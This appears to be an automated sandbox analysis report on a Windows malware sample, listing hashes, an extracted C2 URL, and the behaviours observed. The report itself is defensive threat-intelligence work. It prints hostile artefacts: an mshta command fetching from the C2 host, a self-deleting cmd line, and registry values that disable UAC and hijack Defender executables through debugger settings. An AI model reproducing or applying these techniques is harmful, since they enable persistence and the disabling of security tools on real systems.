Analysis
-
max time kernel
26s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
09-06-2023 07:43
Static task
static1
Behavioral task
behavioral1
Sample
02910399.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
02910399.exe
Resource
win10v2004-20230220-en
Errors
General
-
Target
02910399.exe
-
Size
1023KB
-
MD5
981931159e45242cc1c3dcbdb47846d7
-
SHA1
875bd5c00a30df19216e7f08bc18d97490ed25a6
-
SHA256
69461917822ca791194992d7b7d01e12afbf0eb86ae327b3fb86df01012e060e
-
SHA512
ffad32e77bcd989a20e1226021280204ded3e4ba7987e02978859be966e454785a0c0e196397378ad47d57f251764aeade3836127fe94ef67800342591fc63ce
-
SSDEEP
24576:A+nV9M1Yek6EYqNc4p9cAnlwDUctAaxu190ryaJqc5D9X32pVa:A+nsr1E66eAnEUc6CuEryaJqc5RWpVa
Malware Config
Extracted
http://93.115.82.248/?0=1&1=1&2=9&3=i&4=7601&5=1&6=1111&7=yjqocjklgg
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\guard-braq.exe" guard-braq.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-braq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-braq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-braq.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 808 mshta.exe -
Sets file execution options in registry 2 TTPs 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe guard-braq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe guard-braq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\Debugger = "svchost.exe" guard-braq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" guard-braq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" guard-braq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe guard-braq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "svchost.exe" guard-braq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe guard-braq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger = "svchost.exe" guard-braq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe guard-braq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\Debugger = "svchost.exe" guard-braq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe guard-braq.exe -
Deletes itself 1 IoCs
pid Process 1096 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 1812 guard-braq.exe -
Loads dropped DLL 2 IoCs
pid Process 1852 02910399.exe 1852 02910399.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-braq.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 checkip.dyndns.org -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\eventvwr.msc guard-braq.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc guard-braq.exe File opened for modification C:\Windows\SysWOW64\services.msc guard-braq.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe 1812 guard-braq.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1812 guard-braq.exe Token: SeShutdownPrivilege 1812 guard-braq.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1812 guard-braq.exe 1812 guard-braq.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1812 guard-braq.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1852 02910399.exe 1812 guard-braq.exe 1812 guard-braq.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1852 wrote to memory of 1812 1852 02910399.exe 27 PID 1852 wrote to memory of 1812 1852 02910399.exe 27 PID 1852 wrote to memory of 1812 1852 02910399.exe 27 PID 1852 wrote to memory of 1812 1852 02910399.exe 27 PID 1852 wrote to memory of 1096 1852 02910399.exe 28 PID 1852 wrote to memory of 1096 1852 02910399.exe 28 PID 1852 wrote to memory of 1096 1852 02910399.exe 28 PID 1852 wrote to memory of 1096 1852 02910399.exe 28 PID 1812 wrote to memory of 808 1812 guard-braq.exe 30 PID 1812 wrote to memory of 808 1812 guard-braq.exe 30 PID 1812 wrote to memory of 808 1812 guard-braq.exe 30 PID 1812 wrote to memory of 808 1812 guard-braq.exe 30 -
System policy modification 1 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System guard-braq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-braq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-braq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-braq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" guard-braq.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\02910399.exe"C:\Users\Admin\AppData\Local\Temp\02910399.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Users\Admin\AppData\Roaming\guard-braq.exeC:\Users\Admin\AppData\Roaming\guard-braq.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Sets file execution options in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1812 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://93.115.82.248/?0=1&1=1&2=9&3=i&4=7601&5=1&6=1111&7=yjqocjklgg"3⤵
- Blocklisted process makes network request
PID:808
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\02910399.exe" >> NUL2⤵
- Deletes itself
PID:1096
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:2032
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:1748
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1023KB
MD5981931159e45242cc1c3dcbdb47846d7
SHA1875bd5c00a30df19216e7f08bc18d97490ed25a6
SHA25669461917822ca791194992d7b7d01e12afbf0eb86ae327b3fb86df01012e060e
SHA512ffad32e77bcd989a20e1226021280204ded3e4ba7987e02978859be966e454785a0c0e196397378ad47d57f251764aeade3836127fe94ef67800342591fc63ce
-
Filesize
1023KB
MD5981931159e45242cc1c3dcbdb47846d7
SHA1875bd5c00a30df19216e7f08bc18d97490ed25a6
SHA25669461917822ca791194992d7b7d01e12afbf0eb86ae327b3fb86df01012e060e
SHA512ffad32e77bcd989a20e1226021280204ded3e4ba7987e02978859be966e454785a0c0e196397378ad47d57f251764aeade3836127fe94ef67800342591fc63ce
-
Filesize
1023KB
MD5981931159e45242cc1c3dcbdb47846d7
SHA1875bd5c00a30df19216e7f08bc18d97490ed25a6
SHA25669461917822ca791194992d7b7d01e12afbf0eb86ae327b3fb86df01012e060e
SHA512ffad32e77bcd989a20e1226021280204ded3e4ba7987e02978859be966e454785a0c0e196397378ad47d57f251764aeade3836127fe94ef67800342591fc63ce
-
Filesize
1023KB
MD5981931159e45242cc1c3dcbdb47846d7
SHA1875bd5c00a30df19216e7f08bc18d97490ed25a6
SHA25669461917822ca791194992d7b7d01e12afbf0eb86ae327b3fb86df01012e060e
SHA512ffad32e77bcd989a20e1226021280204ded3e4ba7987e02978859be966e454785a0c0e196397378ad47d57f251764aeade3836127fe94ef67800342591fc63ce
-
Filesize
1023KB
MD5981931159e45242cc1c3dcbdb47846d7
SHA1875bd5c00a30df19216e7f08bc18d97490ed25a6
SHA25669461917822ca791194992d7b7d01e12afbf0eb86ae327b3fb86df01012e060e
SHA512ffad32e77bcd989a20e1226021280204ded3e4ba7987e02978859be966e454785a0c0e196397378ad47d57f251764aeade3836127fe94ef67800342591fc63ce